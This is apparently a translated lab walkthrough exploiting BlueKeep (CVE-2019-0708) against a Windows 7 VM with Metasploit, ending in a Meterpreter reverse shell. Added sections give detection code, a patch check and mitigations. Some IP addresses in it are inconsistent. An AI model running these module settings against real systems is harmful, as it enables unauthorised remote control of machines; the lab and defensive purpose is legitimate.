1. Environment preparation
- Target machine: en_windows_7_ultimate_with_sp1_x64_dvd_618240.iso
- Attack machine: Kali Linux VMware 64-Bit (7z) 2021.1
2. Configuration preparation
- Target and attack machine are on the same network and can reach each other (attacker 172.29.128.5, target 172.29.128.6)
```
┌──(kali㉿kali)-[~/Desktop]
└─$ ping 172.29.128.6
PING 172.29.128.4 (172.29.128.6) 56(84) bytes of data.
64 bytes from 172.29.128.6: icmp_seq=1 ttl=128 time=13.7 ms
64 bytes from 172.29.128.6: icmp_seq=2 ttl=128 time=0.218 ms
rtt min/avg/max/mdev = 0.218/6.940/13.662/6.722 ms
┌──(kali㉿kali)-[~/Desktop]
└─$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.29.128.5 netmask 255.255.0.0 broadcast 172.29.255.255
inet6 fe80::20c:29ff:fe9f:24fb prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:9f:24:fb txqueuelen 1000 (Ethernet)
RX packets 4740844 bytes 314309577 (299.7 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 7276969 bytes 8831983959 (8.2 GiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
```
- The target machine has the Remote Desktop port 3389 open
3. Attack exercise
3.1 Module setup
- Look up the module
```
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > search cve_2019_0708_bluekeep_rce
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/rdp/cve_2019_0708_bluekeep_rce 2019-05-14 manual Yes CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
```
- Select the exploit module
```
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
```
- Set the local address the reverse connection comes back to
```
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set lhost 172.29.128.5
lhost => 172.29.128.5
```
- Set the target address
```
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 172.29.128.6
rhosts => 172.29.128.6
```
- Set the target (see the target list under 5.2)
```
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 4
target => 4
```
- Optional
```
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set forceexploit true
forceexploit => true
```
3.2 Running the exploit
```
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
[*] Started reverse TCP handler on 172.29.128.5:4444
[*] 172.29.128.6:3389 - Executing automatic check (disable AutoCheck to override)
[*] 172.29.128.6:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check
[+] 172.29.128.6:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 172.29.128.6:3389 - Scanned 1 of 1 hosts (100% complete)
[+] 172.29.128.6:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 172.29.128.6:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028600000, Channel count 1.
[!] 172.29.128.6:3389 - <---------------- | Entering Danger Zone | ---------------->
[*] 172.29.128.6:3389 - Surfing channels ...
[*] 172.29.128.6:3389 - Lobbing eggs ...
[*] 172.29.128.6:3389 - Forcing the USE of FREE'd object ...
[!] 172.29.128.6:3389 - <---------------- | Leaving Danger Zone | ---------------->
[*] Sending stage (200262 bytes) to 172.29.128.6
[*] Meterpreter session 1 opened (172.29.128.5:4444 -> 172.29.128.6:49157) at 2021-05-01 18:08:01 -0400
```
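The check output above reports an "incorrectly-bound MS_T120 channel": the vulnerability is triggered by a client that asks the server, by name, for the MS_T120 channel, which is an internal channel no legitimate client requests. That request travels in the CS_NET block of the client data inside the MCS Connect Initial PDU, so a defender can spot it on the wire. The following is an added detection example written for this page (it is not part of the original write-up and not Metasploit code): it parses the type/length-prefixed client data blocks, extracts the requested static virtual channel names from CS_NET, and flags MS_T120. The two sample byte strings are constructed for the example, not captured traffic.

```python
import struct
from typing import Iterator, List, Tuple

# Block types from the client data of an MCS Connect Initial PDU (MS-RDPBCGR 2.2.1.3).
CS_CORE = 0xC001
CS_NET = 0xC003
CHANNEL_DEF_SIZE = 12  # 8-byte NUL-padded name + 4-byte options


def build_block(block_type: int, body: bytes) -> bytes:
    """Prefix a body with the 4-byte user-data header: type and total length, little-endian."""
    return struct.pack("<HH", block_type, 4 + len(body)) + body


def build_cs_net(channels: List[Tuple[str, int]]) -> bytes:
    """Build a CS_NET block: channelCount followed by one CHANNEL_DEF per channel."""
    body = struct.pack("<I", len(channels))
    for name, options in channels:
        body += name.encode("ascii").ljust(8, b"\x00") + struct.pack("<I", options)
    return build_block(CS_NET, body)


def iter_user_data_blocks(data: bytes) -> Iterator[Tuple[int, bytes]]:
    """Walk the type/length-prefixed blocks; reject lengths that run past the buffer."""
    offset = 0
    while offset + 4 <= len(data):
        block_type, length = struct.unpack_from("<HH", data, offset)
        if length < 4 or offset + length > len(data):
            raise ValueError(f"malformed user-data block at offset {offset}")
        yield block_type, data[offset + 4 : offset + length]
        offset += length


def requested_channels(client_data: bytes) -> List[str]:
    """Return the static virtual channel names the client asked the server to create."""
    names: List[str] = []
    for block_type, body in iter_user_data_blocks(client_data):
        if block_type != CS_NET:
            continue
        if len(body) < 4:
            raise ValueError("CS_NET block too short for channelCount")
        (count,) = struct.unpack_from("<I", body, 0)
        if len(body) < 4 + count * CHANNEL_DEF_SIZE:
            raise ValueError("CS_NET channelCount exceeds block length")
        for i in range(count):
            start = 4 + i * CHANNEL_DEF_SIZE
            raw_name = body[start : start + 8]
            names.append(raw_name.split(b"\x00", 1)[0].decode("ascii", errors="replace"))
    return names


def bluekeep_indicators(client_data: bytes) -> List[str]:
    """MS_T120 is a server-internal channel that no legitimate client requests by name.
    A client that does so is the behaviour the check output reports as an
    'incorrectly-bound MS_T120 channel', so flag it."""
    return [
        f"client requested server-internal channel {name!r}"
        for name in requested_channels(client_data)
        if name.upper() == "MS_T120"
    ]


# Constructed samples (not captured traffic): a dummy CS_CORE block followed by a
# CS_NET block. The benign client asks for the usual rdpdr/cliprdr channels; the
# suspicious one additionally asks for MS_T120.
BENIGN_CLIENT_DATA = build_block(CS_CORE, b"\x00" * 16) + build_cs_net(
    [("rdpdr", 0x80800000), ("cliprdr", 0xC0A00000)]
)
SUSPICIOUS_CLIENT_DATA = build_block(CS_CORE, b"\x00" * 16) + build_cs_net(
    [("rdpdr", 0x80800000), ("MS_T120", 0x80000000)]
)

if __name__ == "__main__":
    for label, data in (("benign", BENIGN_CLIENT_DATA), ("suspicious", SUSPICIOUS_CLIENT_DATA)):
        print(label, requested_channels(data), bluekeep_indicators(data))
```

This only works where the Connect Initial is visible in cleartext (standard RDP security); when the session is wrapped in TLS the block is encrypted on the wire, so the inspection point has to be the RDP server itself or a decrypting proxy.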
3.3 Getting a shell
- systeminfo: system information
```
meterpreter > shell
Process 2812 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>systeminfo
systeminfo
Host Name: WIN-UMQ8R7HIGV8
OS Name: Microsoft Windows 7 Ultimate
OS Version: 6.1.7601 Service Pack 1 Build 7601
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00426-292-0000007-85573
Original Install Date: 5/2/2021, 2:50:09 AM
System Boot Time: 5/2/2021, 6:07:04 AM
...
```
- Write a file hi.txt to the desktop
```
C:\>cd Users\dahouzi\Desktop
C:\Users\dahouzi\Desktop>echo "i am come in!" >>hi.txt
echo "i am come in!" >>hi.txt
```
4. Impact and defensive measures
4.1 Two kinds of impact
- Blue screen
When a production system or a personal computer is attacked, it will most likely blue-screen, and the data in running applications or documents being edited is lost.
- Privilege escalation
If the remote privilege escalation succeeds, it is as if I hold every permission on your computer. Your photos with your mistress, hehe!
4.2 Defensive measures
- Install the patch (a firewall does not protect against this)
- Close port 3389, or restrict access to specific IP addresses
4.3 Patch locations
Microsoft advisory: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-0708
- Windows XP, Windows 2003:
https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708
- Windows 7, Windows 2008 R2:
https://www.catalog.update.microsoft.com/Search.aspx?q=KB4499175
- Windows 2008:
https://www.catalog.update.microsoft.com/Search.aspx?q=KB4499180
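Installing the patch is the first measure in 4.2, and the KB numbers in 4.3 make it possible to verify that it actually landed. The following is an added example for this page (not part of the original write-up): it parses the `systeminfo` output that 3.3 shows, maps the OS name onto the families in the patch list above, and reports whether the matching KB appears in the host's hotfix list. The `systeminfo` excerpts are constructed for the example; the hotfix numbers other than KB4499175 are made-up filler, and Windows XP / 2003 get no verdict because 4.3 lists only a guidance page for them, not a KB.

```python
import re
from typing import Dict, List, Optional

# KB numbers for the fix, as listed in 4.3 above. Windows XP / 2003 only have a
# guidance page there, so no KB is recorded for them and they get no verdict.
REQUIRED_KB: Dict[str, str] = {
    "Windows 7 / 2008 R2": "KB4499175",
    "Windows 2008": "KB4499180",
}

# systeminfo lists installed hotfixes as "[01]: KB1234567", one per line.
_HOTFIX_RE = re.compile(r"\[\d+\]:\s*(KB\d+)", re.IGNORECASE)


def parse_systeminfo(text: str) -> Dict[str, object]:
    """Pull OS name, OS version and the installed hotfix list out of systeminfo output."""
    info: Dict[str, object] = {"os_name": "", "os_version": "", "hotfixes": []}
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.startswith("OS Name:"):
            info["os_name"] = stripped.split(":", 1)[1].strip()
        elif stripped.startswith("OS Version:"):
            info["os_version"] = stripped.split(":", 1)[1].strip()
        else:
            m = _HOTFIX_RE.search(stripped)
            if m:
                info["hotfixes"].append(m.group(1).upper())
    return info


def os_family(os_name: str) -> Optional[str]:
    """Map the OS name onto the families of the patch table; 2008 R2 must be tested before 2008."""
    name = os_name.lower()
    if "windows 7" in name or "2008 r2" in name:
        return "Windows 7 / 2008 R2"
    if "2008" in name:
        return "Windows 2008"
    if "windows xp" in name or "2003" in name:
        return "Windows XP / 2003"
    return None


def assess(text: str) -> Dict[str, object]:
    """Decide whether the host has the BlueKeep fix for its OS family installed.
    'patched' is None when the table has no KB for the family (or the OS is unknown)."""
    info = parse_systeminfo(text)
    family = os_family(str(info["os_name"]))
    required = REQUIRED_KB.get(family) if family else None
    patched = None if required is None else required in info["hotfixes"]
    return {
        "family": family,
        "required_kb": required,
        "patched": patched,
        "hotfixes": list(info["hotfixes"]),
    }


# Constructed systeminfo excerpts (not the output captured above). The OS lines match
# the target used in this write-up; the hotfix lists are invented for the example.
UNPATCHED_HOST = """\
Host Name:                 WIN-EXAMPLE
OS Name:                   Microsoft Windows 7 Ultimate
OS Version:                6.1.7601 Service Pack 1 Build 7601
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2534111
                           [02]: KB976902
"""

PATCHED_HOST = UNPATCHED_HOST.replace(
    "2 Hotfix(s) Installed.", "3 Hotfix(s) Installed."
) + "                           [03]: KB4499175\n"

if __name__ == "__main__":
    for label, text in (("unpatched", UNPATCHED_HOST), ("patched", PATCHED_HOST)):
        print(label, assess(text))
```

A `patched: False` result for a host that still exposes 3389 is exactly the combination the write-up demonstrates; the second measure in 4.2 (closing the port or restricting it to known source addresses) is the stop-gap until the KB shows up in the hotfix list.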
5. Other information
5.1 Checking whether the target is vulnerable
- `172.29.128.4:3389 - The target is vulnerable.` means the host is weak and the vulnerability may be present. Note that the module run here, auxiliary/scanner/rdp/ms12_020_check, tests for the older MS12-020 RDP flaw; the check specific to CVE-2019-0708 is auxiliary/scanner/rdp/cve_2019_0708_bluekeep, which the exploit ran automatically in 3.2.
```
msf6 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > auxiliary/scanner/rdp/ms12_020_check
[-] Unknown command: auxiliary/scanner/rdp/ms12_020_check.
This is a module we can load. Do you want to use auxiliary/scanner/rdp/ms12_020_check? [y/N] y
msf6 auxiliary(scanner/rdp/ms12_020_check) > set RHOSTS 172.29.128.4
RHOSTS => 172.29.128.4
msf6 auxiliary(scanner/rdp/ms12_020_check) > run
[+] 172.29.128.4:3389 - 172.29.128.4:3389 - The target is vulnerable.
[*] 172.29.128.4:3389 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
5.2 Confirming the information before the attack
- Target selection
- RHOSTS: 172.29.128.6
- RPORT: 3389
```
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > info
Name: CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
Module: exploit/windows/rdp/cve_2019_0708_bluekeep_rce
Platform: Windows
Arch:
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Manual
Disclosed: 2019-05-14
Provided by:
Sean Dillon <sean.dillon@risksense.com>
Ryan Hanson
OJ Reeves <oj@beyondbinary.io>
Brent Cook <bcook@rapid7.com>
Available targets:
Id Name
-- ----
0 Automatic targeting via fingerprinting
1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)
3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)
4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)
5 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)
6 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
7 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)
8 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - QEMU/KVM)
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RDP_CLIENT_IP 172.29.128.7 yes The client IPv4 address to report during connect
RDP_CLIENT_NAME rdesktop no The client computer name to report during connect, UNSET = random
RDP_DOMAIN no The client domain name to report during connect
RDP_USER no The username to report during connect, UNSET = random
RHOSTS 172.29.128.6 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3389 yes The target port (TCP)
```